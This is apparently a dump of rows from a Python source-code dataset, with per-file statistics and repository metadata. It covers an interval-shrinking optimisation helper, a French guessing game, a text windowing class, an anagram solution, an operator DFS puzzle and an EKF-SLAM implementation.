"""Estimates which step this is (or rather how many steps were collected previously, basing on the ratio
of number of points collected and the batch size).
Note that this method is provisional and may be replaced with a parameter in the config.
Raises:
ValueError if ``n_points`` or ``batch_size`` is less than 1
"""
if min(n_points, batch_size) < 1:
raise ValueError(
f"Both n_points={n_points} and batch_size={batch_size} must be at least 1."
) # pragma: no cover
return n_points // batch_size
def _calculate_shrinking_factor(initial_shrinking_factor: float, step_number: int, n_dim: int) -> float:
"""The length of each in interval bounding the parameter space needs to be multiplied by this number.
Args:
initial_shrinking_factor: in each step the total volume is shrunk by this amount
step_number: optimization step -- if we collected only an initial batch, this step is 1
n_dim: number of dimensions
Example:
Assume that ``initial_shrinking_factor=0.5`` and ``step_number=1``. This means that the total volume should
be multiplied by :math:`1/2`. Hence, if there are :math:`N` dimensions (``n_dim``), the length of each
bounding interval should be multiplied by :math:`1/2^{1/N}`.
However, if ``step_number=3``, each dimension should be shrunk three times, i.e. we need to multiply it by
:math:`1/2^{3/N}`.
Returns:
the shrinking factor for each dimension
"""
assert 0 < initial_shrinking_factor < 1, (
f"Shrinking factor must be between 0 and 1. " f"(Was {initial_shrinking_factor})."
)
assert step_number >= 1 and n_dim >= 1, (
f"Step number and number of dimensions must be greater than 0. "
f"(Where step_number={step_number}, n_dim={n_dim})."
)
return initial_shrinking_factor ** (step_number / n_dim)
def _get_optimum_location(dataset: Dataset) -> np.ndarray:
"""Returns the position (in the transformed space) of the maximum. Shape (n_inputs,)."""
# Retrieve the observations
X, Y = dataset.inputs_array, dataset.output_array
# Return the location of the maximum
best_index = int(np.argmax(Y))
return X[best_index, :]
def shrink_interval(shrinking_factor: float, interval: Interval, shrinking_anchor: float) -> Interval:
"""Shrinks a one-dimensional interval around the ``shrinking_anchor``. The new interval
is centered around the optimum.
Note:
the shrunk interval may not be contained in the initial one. (E.g. if the shrinking anchor is near the
boundary).
Args:
shrinking_factor: by this amount the length interval is multiplied. Expected to be between 0 and 1
interval: endpoints of the interval
shrinking_anchor: point around which the interval will be shrunk
Returns:
endpoints of the shrunk interval
"""
neighborhood = shrinking_factor * (interval[1] - interval[0])
return shrinking_anchor - neighborhood / 2, shrinking_anchor + neighborhood / 2
def _validate_interval(interval: Interval) -> None:
"""Validates whether an interval is non-empty.
Note:
one-point interval :math:`[a, a]` is allowed
Raises:
ValueError: if the end of the interval is less than its origin
"""
origin, end = interval
if end < origin:
raise ValueError(f"Interval [{origin}, {end}] is not a proper one.") # pragma: no cover
def interval_length(interval: Interval) -> float:
"""Returns interval length."""
_validate_interval(interval)
return interval[1] - interval[0]
def shift_to_within_parameter_bounds(new_interval: Interval, old_interval: Interval) -> Interval:
"""Translates ``new_interval`` to ``old_interval``, without changing its volume.
Raises:
ValueError: if translation is not possible.
"""
if interval_length(new_interval) > interval_length(old_interval):
raise ValueError( # pragma: no cover
f"Translation is not possible. New interval {new_interval} is longer "
f"than the original one {old_interval}."
)
new_min, new_max = new_interval
old_min, old_max = old_interval
if old_min <= new_min and new_max <= old_max: # In this case we don't need to translate the interval
return new_interval
else:
if new_min < old_min: # Figure out the direction of the translation
translation = old_min - new_min
else:
translation = old_max - new_max
return new_min + translation, new_max + translation
def _move_to_original_bounds(new_space: Hypercuboid, original_space: Hypercuboid) -> Hypercuboid:
"""Translates ``new_space`` to be a subset of the ``original_space``, without affecting its volume."""
moved_bounds: Hypercuboid = []
for new_interval, old_interval in zip(new_space, original_space):
moved_bounds.append(shift_to_within_parameter_bounds(new_interval=new_interval, old_interval=old_interval))
return moved_bounds
| 41.106452
| 120
| 0.697167
| 1,753
| 12,743
| 4.928694
| 0.225328
| 0.041667
| 0.017824
| 0.005208
| 0.101157
| 0.067824
| 0.042824
| 0.017593
| 0.008796
| 0
| 0
| 0.004593
| 0.214078
| 12,743
| 309
| 121
| 41.239482
| 0.858113
| 0.502943
| 0
| 0.037037
| 0
| 0
| 0.101893
| 0.013011
| 0
| 0
| 0
| 0
| 0.027778
| 1
| 0.101852
| false
| 0
| 0.083333
| 0
| 0.305556
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
a5a44f9a6a387924ac0536e279f50da03dd8ba3f
| 1,146
|
py
|
Python
|
Labs/lab4/l4e3.py
|
felixchiasson/ITI1520
|
4208904bf7576433313524ebd1c1bdb9f49277f2
|
[
"MIT"
] | null | null | null |
Labs/lab4/l4e3.py
|
felixchiasson/ITI1520
|
4208904bf7576433313524ebd1c1bdb9f49277f2
|
[
"MIT"
] | null | null | null |
Labs/lab4/l4e3.py
|
felixchiasson/ITI1520
|
4208904bf7576433313524ebd1c1bdb9f49277f2
|
[
"MIT"
] | null | null | null |
#! /usr/bin/env python3
###############################################################################
# File Name : l4e3.py
# Created By : Fรฉlix Chiasson (7138723)
# Creation Date : [2015-10-06 11:43]
# Last Modified : [2015-10-06 11:56]
# Description : Asks user to guess randomly generated number
###############################################################################
from random import randint
def devine(reponse):
correct = False
essai = 0
print("Let's play a game! Devinez un nombre entre 1 et 10.")
while not correct:
reponse = int(input("Quel est le nombre? "))
if reponse == r:
print("Bravo! Vous avez rรฉussi aprรจs", essai,"essai(s)")
correct = True
elif reponse != r and (reponse >= 1 and reponse <= 10):
if reponse > r:
print("Plus bas!")
if reponse < r:
print("Plus haut!")
essai = essai + 1
else:
print("Veuillez entrer un chiffre entre 1 et 10!")
r = randint(1, 10)
devine(r)
| 35.8125
| 79
| 0.447644
| 123
| 1,146
| 4.170732
| 0.634146
| 0.062378
| 0.05848
| 0.087719
| 0.074074
| 0
| 0
| 0
| 0
| 0
| 0
| 0.062176
| 0.326353
| 1,146
| 31
| 80
| 36.967742
| 0.602332
| 0.251309
| 0
| 0
| 0
| 0
| 0.242775
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.05
| false
| 0
| 0.05
| 0
| 0.1
| 0.25
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
a5a4a070bcfd5efb385e2904922ea624312e4682
| 2,984
|
py
|
Python
|
python/datamongo/text/dmo/text_query_windower.py
|
jiportilla/ontology
|
8a66bb7f76f805c64fc76cfc40ab7dfbc1146f40
|
[
"MIT"
] | null | null | null |
python/datamongo/text/dmo/text_query_windower.py
|
jiportilla/ontology
|
8a66bb7f76f805c64fc76cfc40ab7dfbc1146f40
|
[
"MIT"
] | null | null | null |
python/datamongo/text/dmo/text_query_windower.py
|
jiportilla/ontology
|
8a66bb7f76f805c64fc76cfc40ab7dfbc1146f40
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: UTF-8 -*-
import string
import pandas as pd
from pandas import DataFrame
from base import BaseObject
class TextQueryWindower(BaseObject):
""" Window Text Query Results
"""
__exclude = set(string.punctuation)
def __init__(self,
query_results: dict,
is_debug: bool = False):
"""
Created:
craig.trim@ibm.com
16-Oct-2019
* https://github.ibm.com/GTS-CDO/unstructured-analytics/issues/1122#issuecomment-15340437
:param text_parser_results
the text parser results
:param is_debug:
"""
BaseObject.__init__(self, __name__)
self._is_debug = is_debug
self._query_results = query_results
def _to_text(self):
"""
Purpose:
Transform Query results into pure text
:return:
return a list of text results only
"""
values = set()
for cnum in self._query_results:
[values.add(d['value']) for d in self._query_results[cnum]]
return sorted(values)
def _tokens(self,
term: str,
input_text: str) -> list:
input_text = input_text.lower().replace('\t', ' ')
input_text = ''.join(ch for ch in input_text if ch not in self.__exclude)
tokens = input_text.split(' ')
tokens = [x.strip() for x in tokens if x and len(x.strip())]
tokens = [x.lower() for x in tokens]
if ' ' not in term: # return unigrams
return tokens
if term.count(' ') == 1: # return bigrams
s = set()
for i in range(0, len(tokens)):
if i + 1 < len(tokens):
s.add(f"{tokens[i]} {tokens[i + 1]}")
return sorted(s)
raise NotImplementedError
def process(self,
term: str,
window_size: int = 5) -> DataFrame:
"""
:param term:
:param window_size:
:return:
"""
master = []
term = term.lower().strip()
for input_text in self._to_text():
tokens = self._tokens(term, input_text)
n = tokens.index(term)
def pos_x():
if n - window_size >= 0:
return n - window_size
return 0
def pos_y():
if n + window_size < len(tokens):
return n + window_size
return len(tokens)
x = pos_x()
y = pos_y()
def l_context():
return ' '.join(tokens[x:n]).strip()
def r_context():
return ' '.join(tokens[n + 1:y]).strip()
master.append({
"A": l_context(),
"B": tokens[n],
"C": r_context()})
return pd.DataFrame(master).sort_values(
by=['A'], ascending=False)
| 25.947826
| 103
| 0.499665
| 338
| 2,984
| 4.233728
| 0.349112
| 0.050314
| 0.044724
| 0.025157
| 0.051712
| 0
| 0
| 0
| 0
| 0
| 0
| 0.014811
| 0.389075
| 2,984
| 114
| 104
| 26.175439
| 0.770159
| 0.154826
| 0
| 0.032258
| 0
| 0
| 0.018692
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.129032
| false
| 0
| 0.064516
| 0.032258
| 0.387097
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
a5a553d43dc2a036ccb015ad21d1dcf2af2ae50c
| 640
|
py
|
Python
|
hackerrank/interview_prep/making_anagrams.py
|
luojxxx/CodingPractice
|
bac357aaddbda8e6e73a49c36f2eefd4304b336d
|
[
"MIT"
] | null | null | null |
hackerrank/interview_prep/making_anagrams.py
|
luojxxx/CodingPractice
|
bac357aaddbda8e6e73a49c36f2eefd4304b336d
|
[
"MIT"
] | null | null | null |
hackerrank/interview_prep/making_anagrams.py
|
luojxxx/CodingPractice
|
bac357aaddbda8e6e73a49c36f2eefd4304b336d
|
[
"MIT"
] | null | null | null |
# https://www.hackerrank.com/challenges/ctci-making-anagrams
from collections import Counter
def number_needed(a, b):
aCounts = Counter(a)
bCounts = Counter(b)
aSet = set(aCounts)
bSet = set(bCounts)
similar = aSet.intersection(bSet)
differences = aSet.symmetric_difference(bSet)
matchingKeysDiff = sum([ abs(aCounts[key] - bCounts[key]) for key in similar ])
differentKeysDiff = 0
for key in differences:
if key in aCounts:
differentKeysDiff += aCounts[key]
if key in bCounts:
differentKeysDiff += bCounts[key]
return matchingKeysDiff + differentKeysDiff
| 29.090909
| 83
| 0.678125
| 72
| 640
| 6
| 0.513889
| 0.046296
| 0.037037
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.002028
| 0.229688
| 640
| 22
| 84
| 29.090909
| 0.874239
| 0.090625
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.0625
| false
| 0
| 0.0625
| 0
| 0.1875
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
a5a5adab4d37dc9f239bb54f261403d5485bdb40
| 803
|
py
|
Python
|
DongbinNa/19/pt4.py
|
wonnerky/coteMaster
|
360e491e6342c1ee42ff49750b838a2ead865613
|
[
"Apache-2.0"
] | null | null | null |
DongbinNa/19/pt4.py
|
wonnerky/coteMaster
|
360e491e6342c1ee42ff49750b838a2ead865613
|
[
"Apache-2.0"
] | null | null | null |
DongbinNa/19/pt4.py
|
wonnerky/coteMaster
|
360e491e6342c1ee42ff49750b838a2ead865613
|
[
"Apache-2.0"
] | null | null | null |
n = int(input())
numbers = list(map(int, input().split()))
add, sub, mul, div = map(int, input().split())
def dfs(now, i):
global max_num, min_num, add, sub, mul, div
if i == n:
max_num = max(max_num, now)
min_num = min(min_num, now)
else:
if add > 0:
add -= 1
dfs(now + numbers[i], i + 1)
add += 1
if sub > 0:
sub -= 1
dfs(now - numbers[i], i + 1)
sub += 1
if mul > 0:
mul -= 1
dfs(now * numbers[i], i + 1)
mul += 1
if div > 0:
div -= 1
dfs(int(now / numbers[i]), i + 1)
div += 1
min_num = 1e9
max_num = -1e9
dfs(numbers[0], 1)
print(max_num)
print(min_num)
| 22.305556
| 48
| 0.414695
| 115
| 803
| 2.808696
| 0.217391
| 0.092879
| 0.136223
| 0.148607
| 0.198142
| 0.157895
| 0.157895
| 0
| 0
| 0
| 0
| 0.049107
| 0.442092
| 803
| 35
| 49
| 22.942857
| 0.671875
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.033333
| false
| 0
| 0
| 0
| 0.033333
| 0.066667
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
a5a81b703f6ebb1da895acb3224ef4edc9e40b99
| 19,141
|
py
|
Python
|
Graded/G3/slam/EKFSLAM.py
|
chrstrom/TTK4250
|
f453c3a59597d3fe6cff7d35b790689919798b94
|
[
"Unlicense"
] | null | null | null |
Graded/G3/slam/EKFSLAM.py
|
chrstrom/TTK4250
|
f453c3a59597d3fe6cff7d35b790689919798b94
|
[
"Unlicense"
] | null | null | null |
Graded/G3/slam/EKFSLAM.py
|
chrstrom/TTK4250
|
f453c3a59597d3fe6cff7d35b790689919798b94
|
[
"Unlicense"
] | null | null | null |
from typing import Tuple
import numpy as np
from numpy import ndarray
from dataclasses import dataclass, field
from scipy.linalg import block_diag
import scipy.linalg as la
from utils import rotmat2d
from JCBB import JCBB
import utils
import solution
@dataclass
class EKFSLAM:
Q: ndarray
R: ndarray
do_asso: bool
alphas: 'ndarray[2]' = field(default=np.array([0.001, 0.0001]))
sensor_offset: 'ndarray[2]' = field(default=np.zeros(2))
def f(self, x: np.ndarray, u: np.ndarray) -> np.ndarray:
"""Add the odometry u to the robot state x.
Parameters
----------
x : np.ndarray, shape=(3,)
the robot state
u : np.ndarray, shape=(3,)
the odometry
Returns
-------
np.ndarray, shape = (3,)
the predicted state
"""
psikm1 = x[2]
xk = x[0] + u[0]*np.cos(psikm1) - u[1]*np.sin(psikm1)
yk = x[1] + u[0]*np.sin(psikm1) + u[1]*np.cos(psikm1)
psik = psikm1 + u[2]
xpred = np.array([xk, yk, psik])
return xpred
def Fx(self, x: np.ndarray, u: np.ndarray) -> np.ndarray:
"""Calculate the Jacobian of f with respect to x.
Parameters
----------
x : np.ndarray, shape=(3,)
the robot state
u : np.ndarray, shape=(3,)
the odometry
Returns
-------
np.ndarray
The Jacobian of f wrt. x.
"""
#Fx = solution.EKFSLAM.EKFSLAM.Fx(self, x, u)
#return Fx
psi = x[2]
Fx = np.array([[1, 0, -u[0]*np.sin(psi) - u[1]*np.cos(psi)],
[0, 1, u[0]*np.cos(psi) - u[1]*np.sin(psi)],
[0, 0, 1]])
return Fx
def Fu(self, x: np.ndarray, u: np.ndarray) -> np.ndarray:
"""Calculate the Jacobian of f with respect to u.
Parameters
----------
x : np.ndarray, shape=(3,)
the robot state
u : np.ndarray, shape=(3,)
the odometry
Returns
-------
np.ndarray
The Jacobian of f wrt. u.
"""
#Fu = solution.EKFSLAM.EKFSLAM.Fu(self, x, u)
#return Fu
psi = x[2]
Fu = np.array([[np.cos(psi), -np.sin(psi), 0],
[np.sin(psi), np.cos(psi), 0],
[0, 0, 1]])
return Fu
def predict(
self, eta: np.ndarray, P: np.ndarray, z_odo: np.ndarray
) -> Tuple[np.ndarray, np.ndarray]:
"""Predict the robot state using the zOdo as odometry the corresponding state&map covariance.
Parameters
----------
eta : np.ndarray, shape=(3 + 2*#landmarks,)
the robot state and map concatenated
P : np.ndarray, shape=(3 + 2*#landmarks,)*2
the covariance of eta
z_odo : np.ndarray, shape=(3,)
the measured odometry
Returns
-------
Tuple[np.ndarray, np.ndarray], shapes= (3 + 2*#landmarks,), (3 + 2*#landmarks,)*2
predicted mean and covariance of eta.
"""
#etapred, P = solution.EKFSLAM.EKFSLAM.predict(self, eta, P, z_odo)
#return etapred, P
# check inout matrix
assert np.allclose(P, P.T), "EKFSLAM.predict: not symmetric P input"
assert np.all(
np.linalg.eigvals(P) >= 0
), "EKFSLAM.predict: non-positive eigen values in P input"
assert (
eta.shape * 2 == P.shape
), "EKFSLAM.predict: input eta and P shape do not match"
etapred = np.empty_like(eta)
x = eta[:3]
etapred[:3] = self.f(x, z_odo)
etapred[3:] = eta[3:]
Fx = self.Fx(x, z_odo)
Fu = self.Fu(x, z_odo)
# evaluate covariance prediction in place to save computation
# only robot state changes, so only rows and colums of robot state needs changing
# cov matrix layout:
# [[P_xx, P_xm],
# [P_mx, P_mm]]
P[:3, :3] = Fx@P[:3, :3]@Fx.T + Fu@self.Q@Fu.T
P[:3, 3:] = Fx@P[:3, 3:]
P[3:, :3] = P[:3, 3:].T
assert np.allclose(P, P.T), "EKFSLAM.predict: not symmetric P"
assert np.all(
np.linalg.eigvals(P) > 0
), "EKFSLAM.predict: non-positive eigen values"
assert (
etapred.shape * 2 == P.shape
), "EKFSLAM.predict: calculated shapes does not match"
return etapred, P
def h(self, eta: np.ndarray) -> np.ndarray:
"""Predict all the landmark positions in sensor frame.
Parameters
----------
eta : np.ndarray, shape=(3 + 2 * #landmarks,)
The robot state and landmarks stacked.
Returns
-------
np.ndarray, shape=(2 * #landmarks,)
The landmarks in the sensor frame.
"""
#zpred = solution.EKFSLAM.EKFSLAM.h(self, eta)
#return zpred
# extract states and map
x = eta[0:3]
# reshape map (2, #landmarks), m[:, j] is the jth landmark
m = eta[3:].reshape((-1, 2)).T
Rot = rotmat2d(-x[2])
# relative position of landmark to sensor on robot in world frame
delta_m = (m.T - eta[0:2]).T
# predicted measurements in cartesian coordinates, beware sensor offset for VP
zpredcart = Rot @ delta_m - self.sensor_offset[:, None] # None as index ads an axis with size 1 at that position.
zpred_r = la.norm(zpredcart, 2, axis=0) # ranges
zpred_theta = np.arctan2(zpredcart[1,:], zpredcart[0,:]) # bearings
zpred = np.vstack((zpred_r, zpred_theta)) # the two arrays above stacked on top of each other vertically like
# stack measurements along one dimension, [range1 bearing1 range2 bearing2 ...]
zpred = zpred.T.ravel()
assert (
zpred.ndim == 1 and zpred.shape[0] == eta.shape[0] - 3
), "SLAM.h: Wrong shape on zpred"
return zpred
def h_jac(self, eta: np.ndarray) -> np.ndarray:
"""Calculate the jacobian of h.
Parameters
----------
eta : np.ndarray, shape=(3 + 2 * #landmarks,)
The robot state and landmarks stacked.
Returns
-------
np.ndarray, shape=(2 * #landmarks, 3 + 2 * #landmarks)
the jacobian of h wrt. eta.
"""
# H = solution.EKFSLAM.EKFSLAM.h_jac(self, eta)
# return H
# extract states and map
x = eta[0:3]
# reshape map (2, #landmarks), m[j] is the jth landmark
m = eta[3:].reshape((-1, 2)).T
numM = m.shape[1]
Rot = rotmat2d(x[2])
# relative position of landmark to robot in world frame. m - rho that appears in (11.15) and (11.16)
delta_m = (m.T - eta[0:2]).T
# (2, #measurements), each measured position in cartesian coordinates like
zc = delta_m - Rot @ self.sensor_offset[:, None]
zr = la.norm(zc, 2, axis=0) # ranges
Rpihalf = rotmat2d(np.pi / 2)
# In what follows you can be clever and avoid making this for all the landmarks you _know_
# you will not detect (the maximum range should be available from the data).
# But keep it simple to begin with.
# Allocate H and set submatrices as memory views into H
# You may or may not want to do this like this
# see eq (11.15), (11.16), (11.17)
H = np.zeros((2 * numM, 3 + 2 * numM))
Hx = H[:, :3] # slice view, setting elements of Hx will set H as well
Hm = H[:, 3:] # slice view, setting elements of Hm will set H as well
# proposed way is to go through landmarks one by one
# preallocate and update this for some speed gain if looping
jac_z_cb = -np.eye(2, 3)
for i in range(numM): # But this whole loop can be vectorized
ind = 2 * i # starting postion of the ith landmark into H
# the inds slice for the ith landmark into H
inds = slice(ind, ind + 2)
jac_z_cb[:,2] = -Rpihalf@delta_m[:,i]
jac_x_range = zc[:,i].T / zr[i]
jac_x_bearing = zc[:,i].T @ Rpihalf.T / zr[i]**2
Hx[ind,:] = jac_x_range @ jac_z_cb
Hx[ind+1,:] = jac_x_bearing @ jac_z_cb
Hm[ind,inds] = jac_x_range
Hm[ind+1,inds] = jac_x_bearing
# You can set some assertions here to make sure that some of the structure in H is correct
# Don't mind if I don't :)
return H
def add_landmarks(
self, eta: np.ndarray, P: np.ndarray, z: np.ndarray
) -> Tuple[np.ndarray, np.ndarray]:
"""Calculate new landmarks, their covariances and add them to the state.
Parameters
----------
eta : np.ndarray, shape=(3 + 2*#landmarks,)
the robot state and map concatenated
P : np.ndarray, shape=(3 + 2*#landmarks,)*2
the covariance of eta
z : np.ndarray, shape(2 * #newlandmarks,)
A set of measurements to create landmarks for
Returns
-------
Tuple[np.ndarray, np.ndarray], shapes=(3 + 2*(#landmarks + #newlandmarks,), (3 + 2*(#landmarks + #newlandmarks,)*2
eta with new landmarks appended, and its covariance
"""
# etaadded, Padded = solution.EKFSLAM.EKFSLAM.add_landmarks(
# self, eta, P, z)
# return etaadded, Padded
n = P.shape[0]
assert z.ndim == 1, "SLAM.add_landmarks: z must be a 1d array"
numLmk = z.shape[0] // 2
lmnew = np.empty_like(z)
Gx = np.empty((numLmk * 2, 3))
Rall = np.zeros((numLmk * 2, numLmk * 2))
I2 = np.eye(2) # Preallocate, used for Gx
Rnb = rotmat2d(eta[2])
sensor_offset_world = Rnb @ self.sensor_offset + eta[:2]
sensor_offset_world_der = rotmat2d(
eta[2] + np.pi / 2) @ self.sensor_offset # Used in Gx
for j in range(numLmk):
ind = 2 * j
inds = slice(ind, ind + 2)
zj = z[inds]
ang = zj[1] + eta[2]
rot = rotmat2d(ang) # rotmat in Gz
# calculate position of new landmark in world frame
lmnew[inds] = Rnb @ (zj[0] * np.array([np.cos(zj[1]), np.sin(zj[1])])) + sensor_offset_world
Gx[inds, :2] = I2
Gx[inds, 2] = zj[0] * np.array([-np.sin(ang), np.cos(ang)]) + sensor_offset_world_der
Gz = rot @ np.diag([1, zj[0]])
# Gz * R * Gz^T, transform measurement covariance from polar to cartesian coordinates
Rall[inds, inds] = Gz @ self.R @ Gz.T
assert len(lmnew) % 2 == 0, "SLAM.add_landmark: lmnew not even length"
etaadded = np.append(eta, lmnew) # append new landmarks to state vector
# block diagonal of P_new, see problem text in 1g) in graded assignment 3
Padded = block_diag(P, Gx@P[:3,:3]@Gx.T + Rall)
Padded[:n, n:] = P[:, :3]@Gx.T # top right corner of Padded
Padded[n:, :n] = Padded[:n, n:].T # botton left corner of Padded
assert (
etaadded.shape * 2 == Padded.shape
), "EKFSLAM.add_landmarks: calculated eta and P has wrong shape"
assert np.allclose(
Padded, Padded.T
), "EKFSLAM.add_landmarks: Padded not symmetric"
assert np.all(
np.linalg.eigvals(Padded) >= 0
), "EKFSLAM.add_landmarks: Padded not PSD"
return etaadded, Padded
def associate(
self, z: np.ndarray, zpred: np.ndarray, H: np.ndarray, S: np.ndarray,
): # -> Tuple[*((np.ndarray,) * 5)]:
"""Associate landmarks and measurements, and extract correct matrices for these.
Parameters
----------
z : np.ndarray,
The measurements all in one vector
zpred : np.ndarray
Predicted measurements in one vector
H : np.ndarray
The measurement Jacobian matrix related to zpred
S : np.ndarray
The innovation covariance related to zpred
Returns
-------
Tuple[*((np.ndarray,) * 5)]
The extracted measurements, the corresponding zpred, H, S and the associations.
Note
----
See the associations are calculated using JCBB. See this function for documentation
of the returned association and the association procedure.
"""
if self.do_asso:
# Associate
a = JCBB(z, zpred, S, self.alphas[0], self.alphas[1])
# Extract associated measurements
zinds = np.empty_like(z, dtype=bool)
zinds[::2] = a > -1 # -1 means no association
zinds[1::2] = zinds[::2]
zass = z[zinds]
# extract and rearange predicted measurements and cov
zbarinds = np.empty_like(zass, dtype=int)
zbarinds[::2] = 2 * a[a > -1]
zbarinds[1::2] = 2 * a[a > -1] + 1
zpredass = zpred[zbarinds]
Sass = S[zbarinds][:, zbarinds]
Hass = H[zbarinds]
assert zpredass.shape == zass.shape
assert Sass.shape == zpredass.shape * 2
assert Hass.shape[0] == zpredass.shape[0]
return zass, zpredass, Hass, Sass, a
else:
# should one do something her
pass
def update(
self, eta: np.ndarray, P: np.ndarray, z: np.ndarray
) -> Tuple[np.ndarray, np.ndarray, float, np.ndarray]:
"""Update eta and P with z, associating landmarks and adding new ones.
Parameters
----------
eta : np.ndarray
[description]
P : np.ndarray
[description]
z : np.ndarray, shape=(#detections, 2)
[description]
Returns
-------
Tuple[np.ndarray, np.ndarray, float, np.ndarray]
[description]
"""
# etaupd, Pupd, NIS, a = solution.EKFSLAM.EKFSLAM.update(self, eta, P, z)
#return etaupd, Pupd, NIS, a
numLmk = (eta.size - 3) // 2
assert (len(eta) - 3) % 2 == 0, "EKFSLAM.update: landmark lenght not even"
if numLmk > 0:
# Prediction and innovation covariance
zpred = self.h(eta)
H = self.h_jac(eta)
# Here you can use simply np.kron (a bit slow) to form the big (very big in VP after a while) R,
# or be smart with indexing and broadcasting (3d indexing into 2d mat) realizing you are adding the same R on all diagonals
S = H@P@H.T + np.kron(np.eye(numLmk), self.R)
assert (
S.shape == zpred.shape * 2
), "EKFSLAM.update: wrong shape on either S or zpred"
z = z.ravel() # 2D -> flat
# Perform data association
za, zpred, Ha, Sa, a = self.associate(z, zpred, H, S)
# No association could be made, so skip update
if za.shape[0] == 0:
etaupd = eta
Pupd = P
NIS = 1 # TODO: beware this one when analysing consistency.
else:
# Create the associated innovation
v = za.ravel() - zpred # za: 2D -> flat
v[1::2] = utils.wrapToPi(v[1::2])
# Kalman mean update
S_cho_factors = la.cho_factor(Sa) # Optional, used in places for S^-1, see scipy.linalg.cho_factor and scipy.linalg.cho_solve
Sa_inv = la.cho_solve(S_cho_factors, np.eye(Sa.shape[0]))
W = P@Ha.T@Sa_inv
etaupd = eta + W@v
# Kalman cov update: use Joseph form for stability
jo = -W @ Ha
# same as adding Identity mat
jo[np.diag_indices(jo.shape[0])] += 1
Pupd = jo@P@jo.T + W@np.kron(np.eye(int(len(zpred)/2)), self.R)@W.T
# calculate NIS, can use S_cho_factors
NIS = v.T@Sa_inv@v
# When tested, remove for speed
assert np.allclose(
Pupd, Pupd.T), "EKFSLAM.update: Pupd not symmetric"
assert np.all(
np.linalg.eigvals(Pupd) > 0
), "EKFSLAM.update: Pupd not positive definite"
else: # All measurements are new landmarks,
a = np.full(z.shape[0], -1)
z = z.flatten()
NIS = 1 # TODO: beware this one when analysing consistency.
etaupd = eta
Pupd = P
# Create new landmarks if any is available
if self.do_asso:
is_new_lmk = a == -1
if np.any(is_new_lmk):
z_new_inds = np.empty_like(z, dtype=bool)
z_new_inds[::2] = is_new_lmk
z_new_inds[1::2] = is_new_lmk
z_new = z[z_new_inds]
etaupd, Pupd = self.add_landmarks(etaupd, Pupd, z_new)
assert np.allclose(
Pupd, Pupd.T), "EKFSLAM.update: Pupd must be symmetric"
assert np.all(np.linalg.eigvals(Pupd) >=
0), "EKFSLAM.update: Pupd must be PSD"
return etaupd, Pupd, NIS, a
@classmethod
def NEESes(cls, x: np.ndarray, P: np.ndarray, x_gt: np.ndarray,) -> np.ndarray:
"""Calculates the total NEES and the NEES for the substates
Args:
x (np.ndarray): The estimate
P (np.ndarray): The state covariance
x_gt (np.ndarray): The ground truth
Raises:
AssertionError: If any input is of the wrong shape, and if debug mode is on, certain numeric properties
Returns:
np.ndarray: NEES for [all, position, heading], shape (3,)
"""
assert x.shape == (3,), f"EKFSLAM.NEES: x shape incorrect {x.shape}"
assert P.shape == (3, 3), f"EKFSLAM.NEES: P shape incorrect {P.shape}"
assert x_gt.shape == (
3,), f"EKFSLAM.NEES: x_gt shape incorrect {x_gt.shape}"
d_x = x - x_gt
d_x[2] = utils.wrapToPi(d_x[2])
assert (
-np.pi <= d_x[2] <= np.pi
), "EKFSLAM.NEES: error heading must be between (-pi, pi)"
d_p = d_x[0:2]
P_p = P[0:2, 0:2]
assert d_p.shape == (2,), "EKFSLAM.NEES: d_p must be 2 long"
d_heading = d_x[2] # Note: scalar
assert np.ndim(
d_heading) == 0, "EKFSLAM.NEES: d_heading must be scalar"
P_heading = P[2, 2] # Note: scalar
assert np.ndim(
P_heading) == 0, "EKFSLAM.NEES: P_heading must be scalar"
# NB: Needs to handle both vectors and scalars! Additionally, must handle division by zero
NEES_all = d_x @ (np.linalg.solve(P, d_x))
NEES_pos = d_p @ (np.linalg.solve(P_p, d_p))
try:
NEES_heading = d_heading ** 2 / P_heading
except ZeroDivisionError:
NEES_heading = 1.0 # TODO: beware
NEESes = np.array([NEES_all, NEES_pos, NEES_heading])
NEESes[np.isnan(NEESes)] = 1.0 # We may divide by zero, # TODO: beware
assert np.all(NEESes >= 0), "ESKF.NEES: one or more negative NEESes"
return NEESes
| 35.77757
| 141
| 0.539575
| 2,612
| 19,141
| 3.898162
| 0.174962
| 0.067177
| 0.02475
| 0.020625
| 0.281281
| 0.236005
| 0.209586
| 0.199371
| 0.181006
| 0.152622
| 0
| 0.023466
| 0.340996
| 19,141
| 534
| 142
| 35.844569
| 0.783732
| 0.373021
| 0
| 0.171429
| 0
| 0
| 0.100321
